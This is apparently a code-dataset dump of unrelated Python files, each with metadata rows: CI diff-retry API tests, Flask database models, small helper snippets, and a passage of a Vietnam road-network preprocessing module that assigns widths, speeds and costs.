(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_different_projects_all_failed(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
project2 = self.create_project(
repository=self.project.repository,
name="project 2"
)
build2 = self.create_build(
project=project2,
source=self.source,
status=Status.finished,
result=Result.failed
)
job2 = self.create_job(build=build2)
self.create_plan(project2)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 2
data = [Build.query.get(x['id']) for x in data]
(new_build,) = [x for x in data if x.project_id == build.project_id]
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.source_id == build.source_id
jobs = list(Job.query.filter(
Job.build_id == new_build.id,
))
new_job = jobs[0]
assert new_job.id != job.id
(new_build2,) = [x for x in data if x.project_id == build2.project_id]
assert new_build2.id != build2.id
assert new_build2.collection_id != build2.collection_id
assert new_build2.source_id == build2.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build2.id,
))
assert new_job.id != job2.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_in_whitelist(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
po = ProjectOption(
project=self.project,
name='build.file-whitelist',
value='ci/*',
)
db.session.add(po)
db.session.commit()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_not_in_whitelist(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
po = ProjectOption(
project=self.project,
name='build.file-whitelist',
value='nonexisting_directory',
)
db.session.add(po)
db.session.commit()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_in_blacklist(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/*'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_not_all_in_blacklist(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/not-real'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_invalid_diff(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/not-real'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
with mock.patch('changes.api.diff_build_retry.files_changed_should_trigger_project') as mocked:
mocked.side_effect = InvalidDiffError
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 400
| 32.844398 | 103 | 0.61588 | 1,962 | 15,831 | 4.759429 | 0.087156 | 0.040266 | 0.045941 | 0.049689 | 0.799636 | 0.790426 | 0.788392 | 0.782073 | 0.780788 | 0.769008 | 0 | 0.010677 | 0.278252 | 15,831 | 481 | 104 | 32.912682 | 0.806581 | 0.009412 | 0 | 0.70557 | 0 | 0 | 0.08075 | 0.065952 | 0 | 0 | 0 | 0 | 0.180371 | 1 | 0.04244 | false | 0.007958 | 0.026525 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
86abd0855dc3211ac3d645f9d6bd243a890c7ba9 | 844 | py | Python | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | ["MIT"] | 1 | 2019-09-04T16:02:23.000Z | 2019-09-04T16:02:23.000Z | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | ["MIT"] | null | null | null | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | ["MIT"] | null | null | null | from app import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
email = db.Column(db.String(255), unique=True)
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return '<User %r>' % self.name
class Attendant(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
email = db.Column(db.String(255), unique=True)
img_1 = db.Column(db.String(255))
img_2 = db.Column(db.String(255))
img_3 = db.Column(db.String(255))
img_4 = db.Column(db.String(255))
img_5 = db.Column(db.String(255))
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return '<Attendant %r>' % self.name
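# Hedged usage sketch (not part of the original module; assumes a configured
# Flask-SQLAlchemy `db` bound to an application context, and hypothetical
# example values):
def _example_create_user():
    user = User(name='Alice', email='alice@example.com')
    db.session.add(user)
    db.session.commit()  # persists the new row
    return user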
| 27.225806 | 50 | 0.618483 | 129 | 844 | 3.868217 | 0.24031 | 0.176353 | 0.220441 | 0.288577 | 0.907816 | 0.869739 | 0.693387 | 0.693387 | 0.693387 | 0.693387 | 0 | 0.049307 | 0.231043 | 844 | 30 | 51 | 28.133333 | 0.719569 | 0 | 0 | 0.666667 | 0 | 0 | 0.021327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.041667 | 0.083333 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
86c7eab9a1398cdb9409c57fea1434045864ca38 | 151 | py | Python | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | ["MIT"] | null | null | null | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | ["MIT"] | null | null | null | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | ["MIT"] | null | null | null | from .main import SYS_CONFIG, DEF_CONSTANT, DEF_ARRAY, DEF_CONSTRAINT, CONS_INT, CONS_OPT
from .main import PREC, DIR, LOAD, OUT, EPSILON, ALPHA, EXIT | 75.5 | 90 | 0.788079 | 25 | 151 | 4.52 | 0.76 | 0.141593 | 0.247788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125828 | 151 | 2 | 91 | 75.5 | 0.856061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86d5583a7e3c678b81291c4fe151342d11161d67 | 153 | py | Python | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | ["Apache-2.0"] | 1 | 2018-08-02T06:27:37.000Z | 2018-08-02T06:27:37.000Z | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | ["Apache-2.0"] | 4 | 2018-08-02T06:35:07.000Z | 2018-08-02T06:37:14.000Z | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | ["Apache-2.0"] | null | null | null | class Diff:
def __init__(self, wrapped):
self.wrapped = wrapped
def __str__(self):
return "```diff\n{}```".format(self.wrapped)
| 21.857143 | 52 | 0.594771 | 18 | 153 | 4.611111 | 0.555556 | 0.39759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24183 | 153 | 6 | 53 | 25.5 | 0.715517 | 0 | 0 | 0 | 0 | 0 | 0.091503 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
86e47f34384c693d9b7709cd89a59571199f5091 | 25 | py | Python | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | ["MIT"] | null | null | null | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | ["MIT"] | null | null | null | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | ["MIT"] | null | null | null |
l = [1, 2, 3]
print(len(l)) | 6.25 | 13 | 0.52 | 7 | 25 | 1.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0.12 | 25 | 4 | 13 | 6.25 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
811589c5ec25c65818812b76730c53ed53da0471 | 41,126 | py | Python | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | ["MIT"] | 3 | 2018-07-09T12:15:46.000Z | 2020-12-03T07:02:23.000Z | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | ["MIT"] | 1 | 2019-05-09T21:57:20.000Z | 2019-05-09T21:57:20.000Z | src/vtra/preprocess/transport_network_inputs.py | GFDRR/vietnam-transport | 71f6fc8cb7f1ca7bccb9a29d544869b442e68bfc | ["MIT"] | 2 | 2018-07-23T12:49:21.000Z | 2021-06-03T11:00:44.000Z | """Utility functions for transport networks
Purpose
-------
Helper functions to create post-processed networks with attributes from specific types of input datasets
References
----------
1. Pant, R., Koks, E.E., Russell, T., Schoenmakers, R. & Hall, J.W. (2018).
Analysis and development of model for addressing climate change/disaster risks in multi-modal transport networks in Vietnam.
Final Report, Oxford Infrastructure Analytics Ltd., Oxford, UK.
2. All input data folders and files referred to in the code below.
"""
import csv
import os
import geopandas as gpd
import igraph as ig
import networkx as nx
import numpy as np
import pandas as pd
from vtra.utils import line_length
def assign_province_road_conditions(x):
"""Assign road conditions as paved or unpaved to Province roads
Parameters
x - Pandas DataFrame of values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
Returns
String value as paved or unpaved
"""
asset_code = x.code
asset_level = x.level
# This is an expressway, national and provincial road
if asset_code in (17, 303) or asset_level in (0, 1):
return 'paved'
else:
# Anything else not included above
return 'unpaved'
def assign_assumed_width_to_province_roads_from_file(asset_width, width_range_list):
"""Assign widths to Province roads assets in Vietnam
The widths are assigned based on our understanding of:
1. The reported width in the data which is not reliable
2. A design specification based understanding of the assumed width based on ranges of
values
Parameters
- asset_width - Numeric value for width of asset
- width_range_list - List of tuples containing (from_width, to_width, assumed_width)
Returns
assumed_width - assigned width of the road asset based on design specifications
"""
assumed_width = asset_width
for width_vals in width_range_list:
if width_vals[0] <= assumed_width <= width_vals[1]:
assumed_width = width_vals[2]
break
return assumed_width
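# Hedged example (illustrative only; the real ranges come from the 'widths'
# sheet of the road properties file, so these tuples are assumptions):
#   assign_assumed_width_to_province_roads_from_file(4.2, [(0, 5.5, 4.5), (5.5, 9.0, 7.0)])
# returns 4.5, because 0 <= 4.2 <= 5.5 maps to the assumed width of 4.5.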
def assign_assumed_width_to_province_roads(x):
"""Assign widths to Province roads assets in Vietnam
Parameters
x : int value for width of asset
Returns
int assigned width of the road asset based on design specifications
"""
if float(x.width) == 0:
return 4.5
else:
return float(x.width)
def assign_asset_type_to_province_roads_from_file(asset_code, asset_type_list):
"""Assign asset types to roads assets in Vietnam based on values in file
The types are assigned based on our understanding of:
1. The reported asset code in the data
Parameters
- asset_code - Numeric value for code of asset
- asset_type_list - List of Strings with names of asset types
Returns
asset_type - String name of type of asset
"""
asset_type = 'road'
for asset in asset_type_list:
if asset_code == asset[0]:
asset_type = asset[2]
break
return asset_type
def assign_asset_type_to_province_roads(x):
"""Assign asset types to roads assets in Vietnam
The types are assigned based on our understanding of:
1. The reported asset code in the data
Parameters
x - Pandas DataFrame with numeric asset code
Returns
asset type - Which is either of (Bridge, Dam, Culvert, Tunnel, Spillway, Road)
"""
if x.code in (12, 25):
return 'Bridge'
elif x.code == (23):
return 'Dam'
elif x.code == (24):
return 'Culvert'
elif x.code == (26):
return 'Tunnel'
elif x.code == (27):
return 'Spillway'
else:
return 'Road'
def assign_minmax_travel_speeds_province_roads_apply(x):
"""Assign travel speeds to roads assets in Vietnam
The speeds are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
Returns
- Float minimum assigned speed in km/hr
- Float maximum assigned speed in km/hr
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
if (not asset_terrain) or ('flat' in asset_terrain.lower()):
if asset_code == 17:
# This is an expressway
return 100, 120
elif asset_code in (15, 4):
# This is a residential road or a mountain pass
return 40, 60
elif asset_level == 0:
# This is any other national network asset
return 80, 100
elif asset_level == 1:
# This is any other provincial network asset
return 60, 80
elif asset_level == 2:
# This is any other local network asset
return 40, 60
else:
# Anything else not included above
return 20, 40
else:
if asset_level < 3:
return 40, 60
else:
return 20, 40
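# Hedged examples (illustrative only): a flat row with code == 17 (an
# expressway) yields (100, 120) km/hr, while a mountain row with level >= 3
# falls through to the default of (20, 40) km/hr.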
def assign_minmax_time_costs_province_roads_apply(x, cost_dataframe):
"""Assign time costs on Province roads in Vietnam
The costs are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
min_time_cost = 0
max_time_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.code == asset_code:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
elif cost_param.level == asset_level and cost_param.terrain == asset_terrain:
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_province_roads_apply(x, cost_dataframe):
"""Assign tariff costs on Province roads in Vietnam
The costs are assigned based on our understanding of:
1. The types of assets
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
asset_code = x.code
asset_level = x.level
asset_terrain = x.terrain
min_tariff_cost = 0
max_tariff_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if cost_param.code == asset_code:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
elif cost_param.level == asset_level and cost_param.terrain == asset_terrain:
min_tariff_cost = 1.0*cost_param.tariff_min_usd*x.length
max_tariff_cost = 1.0*cost_param.tariff_max_usd*x.length
break
return min_tariff_cost, max_tariff_cost
def province_shapefile_to_dataframe(edges_in, road_terrain, road_properties_file,usage_factors):
"""Create province network dataframe from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_terrain - String name of terrain: flat or mountainous
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
edges - Geopandas DataFrame with network edge topology and attributes
"""
add_columns = ['number','name','terrain','level','surface','road_class',
'road_cond','asset_type','width','length','min_speed','max_speed',
'min_time','max_time','min_time_cost','max_time_cost','min_tariff_cost',
'max_tariff_cost','vehicle_co']
edges = gpd.read_file(edges_in,encoding='utf-8')
edges.columns = map(str.lower, edges.columns)
edges['number'] = ''
edges['name'] = ''
edges['surface'] = ''
edges['road_class'] = ''
edges['vehicle_co'] = 0
# assign asset terrain
edges['terrain'] = road_terrain
# assign road condition
edges['road_cond'] = edges.apply(assign_province_road_conditions, axis=1)
# assign asset type
asset_type_list = [
tuple(x) for x in
pd.read_excel(road_properties_file, sheet_name='provincial').values
]
edges['asset_type'] = edges.code.apply(
lambda x: assign_asset_type_to_province_roads_from_file(x, asset_type_list))
# get the right line length
edges['length'] = edges.geometry.apply(line_length)
# correct the widths of the road assets
# get the width of edges
# width_range_list = [
# tuple(x) for x in
# pd.read_excel(road_properties_file, sheet_name='widths').values
# ]
# edges['width'] = edges.width.apply(
# lambda x: assign_assumed_width_to_province_roads_from_file(x, width_range_list))
edges['width'] = edges.apply(assign_assumed_width_to_province_roads,axis=1)
# assign minimum and maximum speed to network
edges['speed'] = edges.apply(assign_minmax_travel_speeds_province_roads_apply, axis=1)
edges[['min_speed', 'max_speed']] = edges['speed'].apply(pd.Series)
edges.drop('speed', axis=1, inplace=True)
# assign minimum and maximum travel time to network
edges['min_time'] = edges['length']/edges['max_speed']
edges['max_time'] = edges['length']/edges['min_speed']
cost_values_df = pd.read_excel(road_properties_file, sheet_name='costs')
# assign minimum and maximum cost of time in USD to the network
# the costs of time = (unit cost of time in USD/hr)*(travel time in hr)
edges['time_cost'] = edges.apply(
lambda x: assign_minmax_time_costs_province_roads_apply(x, cost_values_df), axis=1)
edges[['min_time_cost', 'max_time_cost']] = edges['time_cost'].apply(pd.Series)
edges.drop('time_cost', axis=1, inplace=True)
# assign minimum and maximum cost of tonnage in USD/ton to the network
# the costs of tariff = (unit cost of tariff in USD/ton-km)*(length in km)
edges['tariff_cost'] = edges.apply(
lambda x: assign_minmax_tariff_costs_province_roads_apply(x, cost_values_df), axis=1)
edges[['min_tariff_cost', 'max_tariff_cost']] = edges['tariff_cost'].apply(pd.Series)
edges.drop('tariff_cost', axis=1, inplace=True)
edges['min_time_cost'] = (1 + usage_factors[0])*edges['min_time_cost']
edges['max_time_cost'] = (1 + usage_factors[1])*edges['max_time_cost']
edges['min_tariff_cost'] = (1 + usage_factors[0])*edges['min_tariff_cost']
edges['max_tariff_cost'] = (1 + usage_factors[1])*edges['max_tariff_cost']
# make sure that From and To node are the first two columns of the dataframe
# to make sure the conversion from dataframe to igraph network goes smooth
edges = edges[['edge_id','g_id','from_node','to_node'] + add_columns + ['geometry']]
edges = edges.reindex(list(edges.columns)[2:]+list(edges.columns)[:2], axis=1)
return edges
def province_shapefile_to_network(edges_in, road_terrain, road_properties_file,usage_factors):
"""Create province igraph network from inputs
Parameters
- edges_in - String path to edges file/network Shapefile
- road_terrain - String name of terrain: flat or mountainous
- road_properties_file - String path to Excel file with road attributes
- usage_factor - Tuple of 2-float values between 0 and 1
Returns
G - Igraph object with network edge topology and attributes
"""
edges = province_shapefile_to_dataframe(edges_in, road_terrain, road_properties_file,usage_factors)
G = ig.Graph.TupleList(edges.itertuples(index=False), edge_attrs=list(edges.columns)[2:])
return G
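# Hedged usage sketch (not in the original module; the file paths are
# hypothetical assumptions and (0.0, 0.0) applies no extra usage loading):
def _example_province_network():
    """Build a province igraph network for a mountainous province."""
    return province_shapefile_to_network(
        'data/Roads/province_roads_edges.shp',  # hypothetical Shapefile path
        'mountain',
        'data/Roads/road_properties.xlsx',      # hypothetical Excel path
        (0.0, 0.0),
    )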
def assign_national_road_terrain(x):
"""Assign terrain as flat or mountain to national roads
Parameters
x - Pandas DataFrame of values
- dia_hinh__ - String value of type of terrain
Returns
String value of terrain as flat or mountain
"""
terrain_type = x.dia_hinh__
if terrain_type is None:
return 'flat'
elif 'flat' in terrain_type.lower().strip():
# Assume flat for all roads with no terrain
return 'flat'
else:
# Anything else not included above
return 'mountain'
def assign_national_road_conditions(x):
"""Assign road conditions as paved or unpaved to national roads
Parameters
x - Pandas DataFrame of values
- loai_mat__ - String value of road surface
Returns
String value of road as paved or unpaved
"""
road_cond = x.loai_mat__
if road_cond is None:
return 'paved'
elif 'asphalt' in road_cond.lower().strip():
# Assume asphalt for all roads with no condition
return 'paved'
else:
# Anything else not included above
return 'unpaved'
def assign_national_road_class(x):
"""Assign road speeds to national roads
Parameters
x - Pandas DataFrame of values
- capkth__ca - String value of road class
- vehicle_co - Float value of number of vehicles on road
Returns
- Integer value of road class
"""
road_class = x.capkth__ca
vehicle_numbers = x.vehicle_co
if road_class is None:
if vehicle_numbers >= 6000:
return 1
elif 3000 <= vehicle_numbers < 6000:
return 2
elif 1000 <= vehicle_numbers < 3000:
return 3
elif 300 <= vehicle_numbers < 1000:
return 4
elif 50 <= vehicle_numbers < 300:
return 5
else:
return 6
else:
if ',' in road_class:
road_class = road_class.split(',')
else:
road_class = [road_class]
class_1 = [rc for rc in road_class if rc == 'i']
class_2 = [rc for rc in road_class if rc == 'ii']
class_3 = [rc for rc in road_class if rc == 'iii']
class_4 = [rc for rc in road_class if rc == 'iv']
class_5 = [rc for rc in road_class if rc == 'v']
class_6 = [rc for rc in road_class if rc == 'vi']
if class_1:
return 1
elif class_2:
return 2
elif class_3:
return 3
elif class_4:
return 4
elif class_5:
return 5
elif class_6:
return 6
elif vehicle_numbers >= 6000:
return 1
elif 3000 <= vehicle_numbers < 6000:
return 2
elif 1000 <= vehicle_numbers < 3000:
return 3
elif 300 <= vehicle_numbers < 1000:
return 4
elif 50 <= vehicle_numbers < 300:
return 5
else:
return 6
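# Hedged examples (illustrative only): a row with capkth__ca None and
# vehicle_co == 4500 falls into the 3000-6000 band and is assigned class 2;
# a row with capkth__ca 'iii,iv' returns 3, since the best (lowest-numbered)
# listed class wins.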
def assign_assumed_width_to_national_roads_from_file(x, flat_width_range_list, mountain_width_range_list):
"""Assign widths to national roads assets in Vietnam
The widths are assigned based on our understanding of:
1. The class of the road which is not reliable
2. The number of lanes
3. The terrain of the road
Parameters
- x - Pandas DataFrame row with values
- road_class - Integer value of road class
- lanenum__s - Integer value of number of lanes on road
- flat_width_range_list - List of tuples containing (from_width, to_width, assumed_width)
- mountain_width_range_list - List of tuples containing (from_width, to_width, assumed_width)
Returns
assumed_width - Float assigned width of the road asset based on design specifications
"""
road_class = x.road_class
road_lanes = x.lanenum__s
if road_lanes is None:
road_lanes = 0
else:
road_lanes = int(road_lanes)
road_terrain = x.terrain
assumed_width = 3.5
if road_terrain == 'flat':
for vals in flat_width_range_list:
if road_class == vals.road_class:
if road_lanes > 0 and road_lanes <= 8:
assumed_width = road_lanes * vals.lane_width + \
vals.median_strip + 2.0 * vals.shoulder_width
else:
assumed_width = vals.road_width
break
else:
for vals in mountain_width_range_list:
if road_class == vals.road_class:
if road_lanes > 0 and road_lanes <= 8:
assumed_width = road_lanes * vals.lane_width + \
vals.median_strip + 2.0 * vals.shoulder_width
else:
assumed_width = vals.road_width
break
return assumed_width
def assign_min_max_speeds_to_national_roads_from_file(x, flat_width_range_list,
mountain_width_range_list):
"""Assign speeds to national roads in Vietnam
The speeds are assigned based on our understanding of:
1. The class of the road
2. The estimated speed from the CVTS data
3. The terrain of the road
Parameters
x - Pandas DataFrame of values
- road_class - Integer value of road class
- terrain - String value of road terrain
- est_speed - Float value of estimated speed from CVTS data
- flat_width_range_list - List of tuples containing design speeds
- mountain_width_range_list - List of tuples containing design speeds
Returns
- Float minimum assigned speed in km/hr
- Float maximum assigned speed in km/hr
"""
road_class = x.road_class
road_terrain = x.terrain
est_speed = x.est_speed
min_speed = est_speed
max_speed = est_speed
if road_terrain == 'flat':
for vals in flat_width_range_list:
if road_class == vals.road_class:
if est_speed == 0:
min_speed = vals.design_speed
max_speed = vals.design_speed
elif est_speed >= vals.design_speed:
min_speed = vals.design_speed
else:
max_speed = vals.design_speed
break
else:
for vals in mountain_width_range_list:
if road_class == vals.road_class:
if est_speed == 0:
min_speed = vals.design_speed
max_speed = vals.design_speed
elif est_speed >= vals.design_speed:
min_speed = vals.design_speed
else:
max_speed = vals.design_speed
break
return min_speed, max_speed
def assign_minmax_time_costs_national_roads_apply(x, cost_dataframe):
"""Assign time costs on national roads in Vietnam
The costs are assigned based on our understanding of:
1. The vehicle counts on roads
2. The levels of classification of assets: 0-National, 1-Provinical, 2-Local, 3-Other
3. The terrain where the assets are located: Flat or Mountain or No information
Parameters
- x - Pandas dataframe with values
- vehicle_co - Count of number of vehicles on road
- code - Numeric code for type of asset
- level - Numeric code for level of asset
- terrain - String value of the terrain of asset
- length - Float length of edge in km
- min_speed - Float minimum assigned speed in km/hr
- max_speed - Float maximum assigned speed in km/hr
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_time_cost - Float minimum assigned cost of time in USD
- max_time_cost - Float maximum assigned cost of time in USD
"""
if x.vehicle_co > 2000:
asset_code = 17
else:
asset_code = 1
asset_level = 1
asset_terrain = x.terrain
min_time_cost = 0
max_time_cost = 0
cost_list = list(cost_dataframe.itertuples(index=False))
for cost_param in cost_list:
if (cost_param.code == asset_code) and (cost_param.road_cond == x.road_cond):
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
elif (cost_param.level == asset_level) and (cost_param.terrain == asset_terrain) and \
(cost_param.road_cond == x.road_cond):
min_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.max_speed)
max_time_cost = 1.0*cost_param.time_cost_usd*(x.length/x.min_speed)
break
return min_time_cost, max_time_cost
def assign_minmax_tariff_costs_national_roads_apply(x, cost_dataframe):
"""Assign tariff costs on national roads in Vietnam
The costs are assigned based on our understanding of:
1. The vehicle counts on roads
Parameters
- x - Pandas dataframe with values
- vehicle_co - Count of number of vehicles on road
- cost_dataframe - Pandas Dataframe with costs
Returns
- min_tariff_cost - Float minimum assigned tariff cost in USD/ton
- max_tariff_cost - Float maximum assigned tariff cost in USD/ton
"""
min_tariff_cost = 0
